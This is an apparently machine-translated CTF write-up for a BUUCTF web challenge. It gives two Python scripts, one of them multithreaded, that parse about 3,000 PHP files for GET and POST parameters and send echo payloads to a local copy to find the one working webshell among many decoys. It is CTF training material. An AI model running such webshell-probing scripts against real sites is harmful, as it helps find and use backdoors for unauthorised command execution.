BUUCTF WEB [strong network Cup 2019] clever hackers
Open web pages, source code can be found under suggesting ~~
download the source code and found 3002 files, look, found that many of the shell? ? ?
But are not used, in fact, This question is to allow us to find usable shell, the study should be the ability to write the script now! !
Source has been down down, take in a local environment, php 7.0 or more, otherwise it will report a syntax error!
Then write a script (very slowly):
import requests
import sys
import os
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send():
for i in files:
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Get:%s" % (j))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
Send()
This script batch of garbage, estimated to run one day ,,, too dishes ah, directly to give up this script, and,
but not multi-threaded like what ah? ? ? Cried! ! ! I found a bit of multi-threaded python3, changed a bit:
import requests
import sys
import os
import threading
import time
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send(start,end):
start = int(start)
end = int(end)
for i in range(start,end):
i = files[i]
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Url:%s" % (NewUrl))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
Send(self.name, self.counter)
for i in range(0,150):
thread = myThread(i,i*20,(i+1)*20)
thread.start()
Ran about 20 minutes or more, have been:
go directly to a command execution! !
Finally we got the flag:
best, only time will be reduced to more than 20 minutes ,,,
Which big brother if you know a faster way to guide us trouble ,,,,, grateful! ! !